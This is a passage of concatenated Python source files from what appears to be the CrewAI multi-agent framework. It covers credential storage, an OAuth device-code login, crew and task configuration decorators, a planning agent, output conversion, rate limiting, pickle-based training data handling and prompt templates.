self.fernet.decrypt(encrypted_data) data = json.loads(decrypted_data) expiration = datetime.fromisoformat(data["expiration"]) if expiration <= datetime.now(): return None return data["access_token"] def get_secure_storage_path(self) -> Path: """ Get the secure storage path based on the operating system. :return: The secure storage path. """ if sys.platform == "win32": # Windows: Use %LOCALAPPDATA% base_path = os.environ.get("LOCALAPPDATA") elif sys.platform == "darwin": # macOS: Use ~/Library/Application Support base_path = os.path.expanduser("~/Library/Application Support") else: # Linux and other Unix-like: Use ~/.local/share base_path = os.path.expanduser("~/.local/share") app_name = "crewai/credentials" storage_path = Path(base_path) / app_name storage_path.mkdir(parents=True, exist_ok=True) return storage_path def save_secure_file(self, filename: str, content: bytes) -> None: """ Save the content to a secure file. :param filename: The name of the file. :param content: The content to save. """ storage_path = self.get_secure_storage_path() file_path = storage_path / filename with open(file_path, "wb") as f: f.write(content) # Set appropriate permissions (read/write for owner only) os.chmod(file_path, 0o600) def read_secure_file(self, filename: str) -> Optional[bytes]: """ Read the content of a secure file. :param filename: The name of the file. :return: The content of the file if it exists, otherwise None. """ storage_path = self.get_secure_storage_path() file_path = storage_path / filename if not file_path.exists(): return None with open(file_path, "rb") as f: return f.read() File: src/crewai/cli/authentication/main.py import time import webbrowser from typing import Any, Dict import requests from rich.console import Console from .constants import AUTH0_AUDIENCE, AUTH0_CLIENT_ID, AUTH0_DOMAIN from .utils import TokenManager, validate_token console = Console() class AuthenticationCommand: DEVICE_CODE_URL = f"https://{AUTH0_DOMAIN}/oauth/device/code" TOKEN_URL = f"https://{AUTH0_DOMAIN}/oauth/token" def __init__(self): self.token_manager = TokenManager() def signup(self) -> None: """Sign up to CrewAI+""" console.print("Signing Up to CrewAI+ \n", style="bold blue") device_code_data = self._get_device_code() self._display_auth_instructions(device_code_data) return self._poll_for_token(device_code_data) def _get_device_code(self) -> Dict[str, Any]: """Get the device code to authenticate the user.""" device_code_payload = { "client_id": AUTH0_CLIENT_ID, "scope": "openid", "audience": AUTH0_AUDIENCE, } response = requests.post(url=self.DEVICE_CODE_URL, data=device_code_payload) response.raise_for_status() return response.json() def _display_auth_instructions(self, device_code_data: Dict[str, str]) -> None: """Display the authentication instructions to the user.""" console.print("1. Navigate to: ", device_code_data["verification_uri_complete"]) console.print("2. Enter the following code: ", device_code_data["user_code"]) webbrowser.open(device_code_data["verification_uri_complete"]) def _poll_for_token(self, device_code_data: Dict[str, Any]) -> None: """Poll the server for the token.""" token_payload = { "grant_type": "urn:ietf:params:oauth:grant-type:device_code", "device_code": device_code_data["device_code"], "client_id": AUTH0_CLIENT_ID, } attempts = 0 while True and attempts < 5: response = requests.post(self.TOKEN_URL, data=token_payload) token_data = response.json() if response.status_code == 200: validate_token(token_data["id_token"]) expires_in = 360000 # Token expiration time in seconds self.token_manager.save_tokens(token_data["access_token"], expires_in) console.print("\nWelcome to CrewAI+ !!", style="green") return if token_data["error"] not in ("authorization_pending", "slow_down"): raise requests.HTTPError(token_data["error_description"]) time.sleep(device_code_data["interval"]) attempts += 1 console.print( "Timeout: Failed to get the token. Please try again.", style="bold red" ) File: src/crewai/project/crew_base.py import inspect from pathlib import Path from typing import Any, Callable, Dict import yaml from dotenv import load_dotenv load_dotenv() def CrewBase(cls): class WrappedClass(cls): is_crew_class: bool = True # type: ignore # Get the directory of the class being decorated base_directory = Path(inspect.getfile(cls)).parent original_agents_config_path = getattr( cls, "agents_config", "config/agents.yaml" ) original_tasks_config_path = getattr(cls, "tasks_config", "config/tasks.yaml") def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) agents_config_path = self.base_directory / self.original_agents_config_path tasks_config_path = self.base_directory / self.original_tasks_config_path self.agents_config = self.load_yaml(agents_config_path) self.tasks_config = self.load_yaml(tasks_config_path) self.map_all_agent_variables() self.map_all_task_variables() @staticmethod def load_yaml(config_path: Path): try: with open(config_path, "r") as file: return yaml.safe_load(file) except FileNotFoundError: print(f"File not found: {config_path}") raise def _get_all_functions(self): return { name: getattr(self, name) for name in dir(self) if callable(getattr(self, name)) } def _filter_functions( self, functions: Dict[str, Callable], attribute: str ) -> Dict[str, Callable]: return { name: func for name, func in functions.items() if hasattr(func, attribute) } def map_all_agent_variables(self) -> None: all_functions = self._get_all_functions() llms = self._filter_functions(all_functions, "is_llm") tool_functions = self._filter_functions(all_functions, "is_tool") cache_handler_functions = self._filter_functions( all_functions, "is_cache_handler" ) callbacks = self._filter_functions(all_functions, "is_callback") agents = self._filter_functions(all_functions, "is_agent") for agent_name, agent_info in self.agents_config.items(): self._map_agent_variables( agent_name, agent_info, agents, llms, tool_functions, cache_handler_functions, callbacks, ) def _map_agent_variables( self, agent_name: str, agent_info: Dict[str, Any], agents: Dict[str, Callable], llms: Dict[str, Callable], tool_functions: Dict[str, Callable], cache_handler_functions: Dict[str, Callable], callbacks: Dict[str, Callable], ) -> None: if llm := agent_info.get("llm"): self.agents_config[agent_name]["llm"] = llms[llm]() if tools := agent_info.get("tools"): self.agents_config[agent_name]["tools"] = [ tool_functions[tool]() for tool in tools ] if function_calling_llm := agent_info.get("function_calling_llm"): self.agents_config[agent_name]["function_calling_llm"] = agents[ function_calling_llm ]() if step_callback := agent_info.get("step_callback"): self.agents_config[agent_name]["step_callback"] = callbacks[ step_callback ]() if cache_handler := agent_info.get("cache_handler"): self.agents_config[agent_name]["cache_handler"] = ( cache_handler_functions[cache_handler]() ) def map_all_task_variables(self) -> None: all_functions = self._get_all_functions() agents = self._filter_functions(all_functions, "is_agent") tasks = self._filter_functions(all_functions, "is_task") output_json_functions = self._filter_functions( all_functions, "is_output_json" ) tool_functions = self._filter_functions(all_functions, "is_tool") callback_functions = self._filter_functions(all_functions, "is_callback") output_pydantic_functions = self._filter_functions( all_functions, "is_output_pydantic" ) for task_name, task_info in self.tasks_config.items(): self._map_task_variables( task_name, task_info, agents, tasks, output_json_functions, tool_functions, callback_functions, output_pydantic_functions, ) def _map_task_variables( self, task_name: str, task_info: Dict[str, Any], agents: Dict[str, Callable], tasks: Dict[str, Callable], output_json_functions: Dict[str, Callable], tool_functions: Dict[str, Callable], callback_functions: Dict[str, Callable], output_pydantic_functions: Dict[str, Callable], ) -> None: if context_list := task_info.get("context"): self.tasks_config[task_name]["context"] = [ tasks[context_task_name]() for context_task_name in context_list ] if tools := task_info.get("tools"): self.tasks_config[task_name]["tools"] = [ tool_functions[tool]() for tool in tools ] if agent_name := task_info.get("agent"): self.tasks_config[task_name]["agent"] = agents[agent_name]() if output_json := task_info.get("output_json"): self.tasks_config[task_name]["output_json"] = output_json_functions[ output_json ] if output_pydantic := task_info.get("output_pydantic"): self.tasks_config[task_name]["output_pydantic"] = ( output_pydantic_functions[output_pydantic] ) if callbacks := task_info.get("callbacks"): self.tasks_config[task_name]["callbacks"] = [ callback_functions[callback]() for callback in callbacks ] return WrappedClass File: src/crewai/project/__init__.py from .annotations import ( agent, cache_handler, callback, crew, llm, output_json, output_pydantic, pipeline, task, tool, ) from .crew_base import CrewBase from .pipeline_base import PipelineBase __all__ = [ "agent", "crew", "task", "output_json", "output_pydantic", "tool", "callback", "CrewBase", "PipelineBase", "llm", "cache_handler", "pipeline", ] File: src/crewai/project/utils.py def memoize(func): cache = {} def memoized_func(*args, **kwargs): key = (args, tuple(kwargs.items())) if key not in cache: cache[key] = func(*args, **kwargs) return cache[key] memoized_func.__dict__.update(func.__dict__) return memoized_func File: src/crewai/project/pipeline_base.py from typing import Any, Callable, Dict, List, Type, Union from crewai.crew import Crew from crewai.pipeline.pipeline import Pipeline from crewai.routers.router import Router PipelineStage = Union[Crew, List[Crew], Router] # TODO: Could potentially remove. Need to check with @joao and @gui if this is needed for CrewAI+ def PipelineBase(cls: Type[Any]) -> Type[Any]: class WrappedClass(cls): is_pipeline_class: bool = True # type: ignore stages: List[PipelineStage] def __init__(self, *args: Any, **kwargs: Any) -> None: super().__init__(*args, **kwargs) self.stages = [] self._map_pipeline_components() def _get_all_functions(self) -> Dict[str, Callable[..., Any]]: return { name: getattr(self, name) for name in dir(self) if callable(getattr(self, name)) } def _filter_functions( self, functions: Dict[str, Callable[..., Any]], attribute: str ) -> Dict[str, Callable[..., Any]]: return { name: func for name, func in functions.items() if hasattr(func, attribute) } def _map_pipeline_components(self) -> None: all_functions = self._get_all_functions() crew_functions = self._filter_functions(all_functions, "is_crew") router_functions = self._filter_functions(all_functions, "is_router") for stage_attr in dir(self): stage = getattr(self, stage_attr) if isinstance(stage, (Crew, Router)): self.stages.append(stage) elif callable(stage) and hasattr(stage, "is_crew"): self.stages.append(crew_functions[stage_attr]()) elif callable(stage) and hasattr(stage, "is_router"): self.stages.append(router_functions[stage_attr]()) elif isinstance(stage, list) and all( isinstance(item, Crew) for item in stage ): self.stages.append(stage) def build_pipeline(self) -> Pipeline: return Pipeline(stages=self.stages) return WrappedClass File: src/crewai/project/annotations.py from functools import wraps from crewai.project.utils import memoize def task(func): if not hasattr(task, "registration_order"): task.registration_order = [] @wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) if not result.name: result.name = func.__name__ return result setattr(wrapper, "is_task", True) task.registration_order.append(func.__name__) return memoize(wrapper) def agent(func): func.is_agent = True func = memoize(func) return func def llm(func): func.is_llm = True func = memoize(func) return func def output_json(cls): cls.is_output_json = True return cls def output_pydantic(cls): cls.is_output_pydantic = True return cls def tool(func): func.is_tool = True return memoize(func) def callback(func): func.is_callback = True return memoize(func) def cache_handler(func): func.is_cache_handler = True return memoize(func) def stage(func): func.is_stage = True return memoize(func) def router(func): func.is_router = True return memoize(func) def pipeline(func): func.is_pipeline = True return memoize(func) def crew(func): def wrapper(self, *args, **kwargs): instantiated_tasks = [] instantiated_agents = [] agent_roles = set() all_functions = { name: getattr(self, name) for name in dir(self) if callable(getattr(self, name)) } tasks = { name: func for name, func in all_functions.items() if hasattr(func, "is_task") } agents = { name: func for name, func in all_functions.items() if hasattr(func, "is_agent") } # Sort tasks by their registration order sorted_task_names = sorted( tasks, key=lambda name: task.registration_order.index(name) ) # Instantiate tasks in the order they were defined for task_name in sorted_task_names: task_instance = tasks[task_name]() instantiated_tasks.append(task_instance) agent_instance = getattr(task_instance, "agent", None) if agent_instance is not None: agent_instance = task_instance.agent if agent_instance.role not in agent_roles: instantiated_agents.append(agent_instance) agent_roles.add(agent_instance.role) # Instantiate any additional agents not already included by tasks for agent_name in agents: temp_agent_instance = agents[agent_name]() if temp_agent_instance.role not in agent_roles: instantiated_agents.append(temp_agent_instance) agent_roles.add(temp_agent_instance.role) self.agents = instantiated_agents self.tasks = instantiated_tasks return func(self, *args, **kwargs) return wrapper File: src/crewai/utilities/planning_handler.py from typing import Any, List, Optional from langchain_openai import ChatOpenAI from pydantic import BaseModel, Field from crewai.agent import Agent from crewai.task import Task class PlanPerTask(BaseModel): task: str = Field(..., description="The task for which the plan is created") plan: str = Field( ..., description="The step by step plan on how the agents can execute their tasks using the available tools with mastery", ) class PlannerTaskPydanticOutput(BaseModel): list_of_plans_per_task: List[PlanPerTask] = Field( ..., description="Step by step plan on how the agents can execute their tasks using the available tools with mastery", ) class CrewPlanner: def __init__(self, tasks: List[Task], planning_agent_llm: Optional[Any] = None): self.tasks = tasks if planning_agent_llm is None: self.planning_agent_llm = ChatOpenAI(model="gpt-4o-mini") else: self.planning_agent_llm = planning_agent_llm def _handle_crew_planning(self) -> PlannerTaskPydanticOutput: """Handles the Crew planning by creating detailed step-by-step plans for each task.""" planning_agent = self._create_planning_agent() tasks_summary = self._create_tasks_summary() planner_task = self._create_planner_task(planning_agent, tasks_summary) result = planner_task.execute_sync() if isinstance(result.pydantic, PlannerTaskPydanticOutput): return result.pydantic raise ValueError("Failed to get the Planning output") def _create_planning_agent(self) -> Agent: """Creates the planning agent for the crew planning.""" return Agent( role="Task Execution Planner", goal=( "Your goal is to create an extremely detailed, step-by-step plan based on the tasks and tools " "available to each agent so that they can perform the tasks in an exemplary manner" ), backstory="Planner agent for crew planning", llm=self.planning_agent_llm, ) def _create_planner_task(self, planning_agent: Agent, tasks_summary: str) -> Task: """Creates the planner task using the given agent and tasks summary.""" return Task( description=( f"Based on these tasks summary: {tasks_summary} \n Create the most descriptive plan based on the tasks " "descriptions, tools available, and agents' goals for them to execute their goals with perfection." ), expected_output="Step by step plan on how the agents can execute their tasks using the available tools with mastery", agent=planning_agent, output_pydantic=PlannerTaskPydanticOutput, ) def _create_tasks_summary(self) -> str: """Creates a summary of all tasks.""" tasks_summary = [] for idx, task in enumerate(self.tasks): tasks_summary.append( f""" Task Number {idx + 1} - {task.description} "task_description": {task.description} "task_expected_output": {task.expected_output} "agent": {task.agent.role if task.agent else "None"} "agent_goal": {task.agent.goal if task.agent else "None"} "task_tools": {task.tools} "agent_tools": {task.agent.tools if task.agent else "None"} """ ) return " ".join(tasks_summary) File: src/crewai/utilities/formatter.py from typing import List from crewai.task import Task from crewai.tasks.task_output import TaskOutput def aggregate_raw_outputs_from_task_outputs(task_outputs: List[TaskOutput]) -> str: """Generate string context from the task outputs.""" dividers = "\n\n----------\n\n" # Join task outputs with dividers context = dividers.join(output.raw for output in task_outputs) return context def aggregate_raw_outputs_from_tasks(tasks: List[Task]) -> str: """Generate string context from the tasks.""" task_outputs = [task.output for task in tasks if task.output is not None] return aggregate_raw_outputs_from_task_outputs(task_outputs) File: src/crewai/utilities/file_handler.py import os import pickle from datetime import datetime class FileHandler: """take care of file operations, currently it only logs messages to a file""" def __init__(self, file_path): if isinstance(file_path, bool): self._path = os.path.join(os.curdir, "logs.txt") elif isinstance(file_path, str): self._path = file_path else: raise ValueError("file_path must be either a boolean or a string.") def log(self, **kwargs): now = datetime.now().strftime("%Y-%m-%d %H:%M:%S") message = f"{now}: ".join([f"{key}={value}" for key, value in kwargs.items()]) with open(self._path, "a", encoding="utf-8") as file: file.write(message + "\n") class PickleHandler: def __init__(self, file_name: str) -> None: """ Initialize the PickleHandler with the name of the file where data will be stored. The file will be saved in the current directory. Parameters: - file_name (str): The name of the file for saving and loading data. """ if not file_name.endswith(".pkl"): file_name += ".pkl" self.file_path = os.path.join(os.getcwd(), file_name) def initialize_file(self) -> None: """ Initialize the file with an empty dictionary and overwrite any existing data. """ self.save({}) def save(self, data) -> None: """ Save the data to the specified file using pickle. Parameters: - data (object): The data to be saved. """ with open(self.file_path, "wb") as file: pickle.dump(data, file) def load(self) -> dict: """ Load the data from the specified file using pickle. Returns: - dict: The data loaded from the file. """ if not os.path.exists(self.file_path) or os.path.getsize(self.file_path) == 0: return {} # Return an empty dictionary if the file does not exist or is empty with open(self.file_path, "rb") as file: try: return pickle.load(file) except EOFError: return {} # Return an empty dictionary if the file is empty or corrupted except Exception: raise # Raise any other exceptions that occur during loading File: src/crewai/utilities/config.py from typing import Any, Dict, Type from pydantic import BaseModel def process_config( values: Dict[str, Any], model_class: Type[BaseModel] ) -> Dict[str, Any]: """ Process the config dictionary and update the values accordingly. Args: values (Dict[str, Any]): The dictionary of values to update. model_class (Type[BaseModel]): The Pydantic model class to reference for field validation. Returns: Dict[str, Any]: The updated values dictionary. """ config = values.get("config", {}) if not config: return values # Copy values from config (originally from YAML) to the model's attributes. # Only copy if the attribute isn't already set, preserving any explicitly defined values. for key, value in config.items(): if key not in model_class.model_fields or values.get(key) is not None: continue if isinstance(value, dict): if isinstance(values.get(key), dict): values[key].update(value) else: values[key] = value else: values[key] = value # Remove the config from values to avoid duplicate processing values.pop("config", None) return values File: src/crewai/utilities/rpm_controller.py import threading import time from typing import Optional from pydantic import BaseModel, Field, PrivateAttr, model_validator from crewai.utilities.logger import Logger class RPMController(BaseModel): max_rpm: Optional[int] = Field(default=None) logger: Logger = Field(default_factory=lambda: Logger(verbose=False)) _current_rpm: int = PrivateAttr(default=0) _timer: Optional[threading.Timer] = PrivateAttr(default=None) _lock: Optional[threading.Lock] = PrivateAttr(default=None) _shutdown_flag: bool = PrivateAttr(default=False) @model_validator(mode="after") def reset_counter(self): if self.max_rpm is not None: if not self._shutdown_flag: self._lock = threading.Lock() self._reset_request_count() return self def check_or_wait(self): if self.max_rpm is None: return True def _check_and_increment(): if self.max_rpm is not None and self._current_rpm < self.max_rpm: self._current_rpm += 1 return True elif self.max_rpm is not None: self.logger.log( "info", "Max RPM reached, waiting for next minute to start." ) self._wait_for_next_minute() self._current_rpm = 1 return True return True if self._lock: with self._lock: return _check_and_increment() else: return _check_and_increment() def stop_rpm_counter(self): if self._timer: self._timer.cancel() self._timer = None def _wait_for_next_minute(self): time.sleep(60) self._current_rpm = 0 def _reset_request_count(self): def _reset(): self._current_rpm = 0 if not self._shutdown_flag: self._timer = threading.Timer(60.0, self._reset_request_count) self._timer.start() if self._lock: with self._lock: _reset() else: _reset() if self._timer: self._shutdown_flag = True self._timer.cancel() File: src/crewai/utilities/paths.py import os from pathlib import Path import appdirs def db_storage_path(): app_name = get_project_directory_name() app_author = "CrewAI" data_dir = Path(appdirs.user_data_dir(app_name, app_author)) data_dir.mkdir(parents=True, exist_ok=True) return data_dir def get_project_directory_name(): project_directory_name = os.environ.get("CREWAI_STORAGE_DIR") if project_directory_name: return project_directory_name else: cwd = Path.cwd() project_directory_name = cwd.name return project_directory_name File: src/crewai/utilities/pydantic_schema_parser.py from typing import Type, get_args, get_origin from pydantic import BaseModel class PydanticSchemaParser(BaseModel): model: Type[BaseModel] def get_schema(self) -> str: """ Public method to get the schema of a Pydantic model. :param model: The Pydantic model class to generate schema for. :return: String representation of the model schema. """ return self._get_model_schema(self.model) def _get_model_schema(self, model, depth=0) -> str: indent = " " * depth lines = [f"{indent}{{"] for field_name, field in model.model_fields.items(): field_type_str = self._get_field_type(field, depth + 1) lines.append(f"{indent} {field_name}: {field_type_str},") lines[-1] = lines[-1].rstrip(",") # Remove trailing comma from last item lines.append(f"{indent}}}") return "\n".join(lines) def _get_field_type(self, field, depth) -> str: field_type = field.annotation if get_origin(field_type) is list: list_item_type = get_args(field_type)[0] if isinstance(list_item_type, type) and issubclass( list_item_type, BaseModel ): nested_schema = self._get_model_schema(list_item_type, depth + 1) return f"List[\n{nested_schema}\n{' ' * 4 * depth}]" else: return f"List[{list_item_type.__name__}]" elif issubclass(field_type, BaseModel): return self._get_model_schema(field_type, depth) else: return field_type.__name__ File: src/crewai/utilities/constants.py TRAINING_DATA_FILE = "training_data.pkl" TRAINED_AGENTS_DATA_FILE = "trained_agents_data.pkl" File: src/crewai/utilities/converter.py import json import re from typing import Any, Optional, Type, Union from langchain.schema import HumanMessage, SystemMessage from langchain_openai import ChatOpenAI from pydantic import BaseModel, ValidationError from crewai.agents.agent_builder.utilities.base_output_converter import OutputConverter from crewai.utilities.printer import Printer from crewai.utilities.pydantic_schema_parser import PydanticSchemaParser class ConverterError(Exception): """Error raised when Converter fails to parse the input.""" def __init__(self, message: str, *args: object) -> None: super().__init__(message, *args) self.message = message class Converter(OutputConverter): """Class that converts text into either pydantic or json.""" def to_pydantic(self, current_attempt=1): """Convert text to pydantic.""" try: if self.is_gpt: return self._create_instructor().to_pydantic() else: return self._create_chain().invoke({}) except Exception as e: if current_attempt < self.max_attempts: return self.to_pydantic(current_attempt + 1) return ConverterError( f"Failed to convert text into a pydantic model due to the following error: {e}" ) def to_json(self, current_attempt=1): """Convert text to json.""" try: if self.is_gpt: return self._create_instructor().to_json() else: return json.dumps(self._create_chain().invoke({}).model_dump()) except Exception as e: if current_attempt < self.max_attempts: return self.to_json(current_attempt + 1) return ConverterError(f"Failed to convert text into JSON, error: {e}.") def _create_instructor(self): """Create an instructor.""" from crewai.utilities import Instructor inst = Instructor( llm=self.llm, max_attempts=self.max_attempts, model=self.model, content=self.text, instructions=self.instructions, ) return inst def _create_chain(self): """Create a chain.""" from crewai.utilities.crew_pydantic_output_parser import ( CrewPydanticOutputParser, ) parser = CrewPydanticOutputParser(pydantic_object=self.model) new_prompt = SystemMessage(content=self.instructions) + HumanMessage( content=self.text ) return new_prompt | self.llm | parser @property def is_gpt(self) -> bool: """Return if llm provided is of gpt from openai.""" return isinstance(self.llm, ChatOpenAI) and self.llm.openai_api_base is None def convert_to_model( result: str, output_pydantic: Optional[Type[BaseModel]], output_json: Optional[Type[BaseModel]], agent: Any, converter_cls: Optional[Type[Converter]] = None, ) -> Union[dict, BaseModel, str]: model = output_pydantic or output_json if model is None: return result try: escaped_result = json.dumps(json.loads(result, strict=False)) return validate_model(escaped_result, model, bool(output_json)) except json.JSONDecodeError as e: Printer().print( content=f"Error parsing JSON: {e}. Attempting to handle partial JSON.", color="yellow", ) return handle_partial_json( result, model, bool(output_json), agent, converter_cls ) except ValidationError as e: Printer().print( content=f"Pydantic validation error: {e}. Attempting to handle partial JSON.", color="yellow", ) return handle_partial_json( result, model, bool(output_json), agent, converter_cls ) except Exception as e: Printer().print( content=f"Unexpected error during model conversion: {type(e).__name__}: {e}. Returning original result.", color="red", ) return result def validate_model( result: str, model: Type[BaseModel], is_json_output: bool ) -> Union[dict, BaseModel]: exported_result = model.model_validate_json(result) if is_json_output: return exported_result.model_dump() return exported_result def handle_partial_json( result: str, model: Type[BaseModel], is_json_output: bool, agent: Any, converter_cls: Optional[Type[Converter]] = None, ) -> Union[dict, BaseModel, str]: match = re.search(r"({.*})", result, re.DOTALL) if match: try: exported_result = model.model_validate_json(match.group(0)) if is_json_output: return exported_result.model_dump() return exported_result except json.JSONDecodeError as e: Printer().print( content=f"Error parsing JSON: {e}. The extracted JSON-like string is not valid JSON. Attempting alternative conversion method.", color="yellow", ) except ValidationError as e: Printer().print( content=f"Pydantic validation error: {e}. The JSON structure doesn't match the expected model. Attempting alternative conversion method.", color="yellow", ) except Exception as e: Printer().print( content=f"Unexpected error during partial JSON handling: {type(e).__name__}: {e}. Attempting alternative conversion method.", color="red", ) return convert_with_instructions( result, model, is_json_output, agent, converter_cls ) def convert_with_instructions( result: str, model: Type[BaseModel], is_json_output: bool, agent: Any, converter_cls: Optional[Type[Converter]] = None, ) -> Union[dict, BaseModel, str]: llm = agent.function_calling_llm or agent.llm instructions = get_conversion_instructions(model, llm) converter = create_converter( agent=agent, converter_cls=converter_cls, llm=llm, text=result, model=model, instructions=instructions, ) exported_result = ( converter.to_pydantic() if not is_json_output else converter.to_json() ) if isinstance(exported_result, ConverterError): Printer().print( content=f"{exported_result.message} Using raw output instead.", color="red", ) return result return exported_result def get_conversion_instructions(model: Type[BaseModel], llm: Any) -> str: instructions = "I'm gonna convert this raw text into valid JSON." if not is_gpt(llm): model_schema = PydanticSchemaParser(model=model).get_schema() instructions = f"{instructions}\n\nThe json should have the following structure, with the following keys:\n{model_schema}" return instructions def is_gpt(llm: Any) -> bool: from langchain_openai import ChatOpenAI return isinstance(llm, ChatOpenAI) and llm.openai_api_base is None def create_converter( agent: Optional[Any] = None, converter_cls: Optional[Type[Converter]] = None, *args, **kwargs, ) -> Converter: if agent and not converter_cls: if hasattr(agent, "get_output_converter"): converter = agent.get_output_converter(*args, **kwargs) else: raise AttributeError("Agent does not have a 'get_output_converter' method") elif converter_cls: converter = converter_cls(*args, **kwargs) else: raise ValueError("Either agent or converter_cls must be provided") if not converter: raise Exception("No output converter found or set.") return converter File: src/crewai/utilities/__init__.py from .converter import Converter, ConverterError from .file_handler import FileHandler from .i18n import I18N from .instructor import Instructor from .logger import Logger from .parser import YamlParser from .printer import Printer from .prompts import Prompts from .rpm_controller import RPMController from .exceptions.context_window_exceeding_exception import ( LLMContextLengthExceededException, ) __all__ = [ "Converter", "ConverterError", "FileHandler", "I18N", "Instructor", "Logger", "Printer", "Prompts", "RPMController", "YamlParser", "LLMContextLengthExceededException", ] File: src/crewai/utilities/instructor.py from typing import Any, Optional, Type import instructor from pydantic import BaseModel, Field, PrivateAttr, model_validator class Instructor(BaseModel): """Class that wraps an agent llm with instructor.""" _client: Any = PrivateAttr() content: str = Field(description="Content to be sent to the instructor.") agent: Optional[Any] = Field( description="The agent that needs to use instructor.", default=None ) llm: Optional[Any] = Field( description="The agent that needs to use instructor.", default=None ) instructions: Optional[str] = Field( description="Instructions to be sent to the instructor.", default=None, ) model: Type[BaseModel] = Field( description="Pydantic model to be used to create an output." ) @model_validator(mode="after") def set_instructor(self): """Set instructor.""" if self.agent and not self.llm: self.llm = self.agent.function_calling_llm or self.agent.llm self._client = instructor.patch( self.llm.client._client, mode=instructor.Mode.TOOLS, ) return self def to_json(self): model = self.to_pydantic() return model.model_dump_json(indent=2) def to_pydantic(self): messages = [{"role": "user", "content": self.content}] if self.instructions: messages.append({"role": "system", "content": self.instructions}) model = self._client.chat.completions.create( model=self.llm.model_name, response_model=self.model, messages=messages ) return model File: src/crewai/utilities/logger.py from datetime import datetime from pydantic import BaseModel, Field, PrivateAttr from crewai.utilities.printer import Printer class Logger(BaseModel): verbose: bool = Field(default=False) _printer: Printer = PrivateAttr(default_factory=Printer) def log(self, level, message, color="bold_green"): if self.verbose: timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S") self._printer.print( f"[{timestamp}][{level.upper()}]: {message}", color=color ) File: src/crewai/utilities/training_handler.py from crewai.utilities.file_handler import PickleHandler class CrewTrainingHandler(PickleHandler): def save_trained_data(self, agent_id: str, trained_data: dict) -> None: """ Save the trained data for a specific agent. Parameters: - agent_id (str): The ID of the agent. - trained_data (dict): The trained data to be saved. """ data = self.load() data[agent_id] = trained_data self.save(data) def append(self, train_iteration: int, agent_id: str, new_data) -> None: """ Append new data to the existing pickle file. Parameters: - new_data (object): The new data to be appended. """ data = self.load() if agent_id in data: data[agent_id][train_iteration] = new_data else: data[agent_id] = {train_iteration: new_data} self.save(data) File: src/crewai/utilities/prompts.py from typing import Any, ClassVar, Optional from langchain.prompts import BasePromptTemplate, PromptTemplate from pydantic import BaseModel, Field from crewai.utilities import I18N class Prompts(BaseModel): """Manages and generates prompts for a generic agent.""" i18n: I18N = Field(default=I18N()) tools: list[Any] = Field(default=[]) system_template: Optional[str] = None prompt_template: Optional[str] = None response_template: Optional[str] = None SCRATCHPAD_SLICE: ClassVar[str] = "\n{agent_scratchpad}" def task_execution(self) -> BasePromptTemplate: """Generate a standard prompt for task execution.""" slices = ["role_playing"] if len(self.tools) > 0: slices.append("tools") else: slices.append("no_tools") slices.append("task") if not self.system_template and not self.prompt_template: return self._build_prompt(slices) else: return self._build_prompt( slices, self.system_template, self.prompt_template, self.response_template, ) def _build_prompt( self, components: list[str], system_template=None, prompt_template=None, response_template=None, ) -> BasePromptTemplate: """Constructs a prompt string from specified components.""" if not system_template and not prompt_template: prompt_parts = [self.i18n.slice(component) for component in components] prompt_parts.append(self.SCRATCHPAD_SLICE) prompt = PromptTemplate.from_template("".join(prompt_parts)) else: prompt_parts = [ self.i18n.slice(component) for component in components if component != "task" ] system = system_template.replace("{{ .System }}", "".join(prompt_parts)) prompt = prompt_template.replace( "{{ .Prompt }}", "".join([self.i18n.slice("task"), self.SCRATCHPAD_SLICE]), ) response = response_template.split("{{ .Response }}")[0] prompt = PromptTemplate.from_template(f"{system}\n{prompt}\n{response}") return prompt File: src/crewai/utilities/parser.py import re class YamlParser: @staticmethod def parse(file): """ Parses a YAML file, modifies specific patterns, and checks for unsupported 'context' usage. Args: file (file object): The YAML file to parse. Returns: str: The modified content of the YAML file. Raises: ValueError: If 'context:' is used incorrectly. """ content = file.read() # Replace single { and } with doubled ones, while leaving already doubled ones intact and the other special characters {# and {% modified_content = re.sub(r"(?<!\{){(?!\{)(?!\#)(?!\%)", "{{", content) modified_content = re.sub( r"(?<!\})(?<!\%)(?<!\#)\}(?!})", "}}", modified_content ) # Check for 'context:' not followed by '[' and raise an error if re.search(r"context:(?!\s*\[)", modified_content): raise ValueError( "Context is currently only supported in code when creating a task. " "Please use the 'context' key in the task configuration." ) return modified_content File: src/crewai/utilities/crew_json_encoder.py from datetime import datetime import json from uuid import UUID from pydantic import BaseModel class CrewJSONEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, BaseModel): return self._handle_pydantic_model(obj) elif isinstance(obj, UUID): return str(obj) elif isinstance(obj, datetime): return obj.isoformat() return super().default(obj) def _handle_pydantic_model(self, obj): try: data = obj.model_dump() # Remove circular references for key, value in data.items(): if isinstance(value, BaseModel): data[key] = str( value ) # Convert nested models to string representation return data except RecursionError: return str( obj ) # Fall back to string representation if circular reference is detected File: src/crewai/utilities/token_counter_callback.py from typing import Any, Dict, List import tiktoken from langchain.callbacks.base import BaseCallbackHandler from langchain.schema import LLMResult from crewai.agents.agent_builder.utilities.base_token_process import TokenProcess class TokenCalcHandler(BaseCallbackHandler): model_name: str = "" token_cost_process: TokenProcess encoding: tiktoken.Encoding def __init__(self, model_name, token_cost_process): self.model_name = model_name self.token_cost_process = token_cost_process try: self.encoding = tiktoken.encoding_for_model(self.model_name) except KeyError: self.encoding = tiktoken.get_encoding("cl100k_base") def on_llm_start( self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any ) -> None: if self.token_cost_process is None: return for prompt in prompts: self.token_cost_process.sum_prompt_tokens(len(self.encoding.encode(prompt))) async def on_llm_new_token(self, token: str, **kwargs) -> None: self.token_cost_process.sum_completion_tokens(1) def on_llm_end(self, response: LLMResult, **kwargs: Any) -> None: self.token_cost_process.sum_successful_requests(1) File: src/crewai/utilities/i18n.py import json import os from typing import Dict, Optional from pydantic import BaseModel, Field, PrivateAttr, model_validator class I18N(BaseModel): _prompts: Dict[str, Dict[str, str]] = PrivateAttr() prompt_file: Optional[str] = Field( default=None, description="Path to the prompt_file file to load", ) @model_validator(mode="after") def load_prompts(self) -> "I18N": """Load prompts from a JSON file.""" try: if self.prompt_file: with open(self.prompt_file, "r") as f: self._prompts = json.load(f) else: dir_path = os.path.dirname(os.path.realpath(__file__)) prompts_path = os.path.join(dir_path, "../translations/en.json") with open(prompts_path, "r") as f: self._prompts = json.load(f) except FileNotFoundError: raise Exception(f"Prompt file 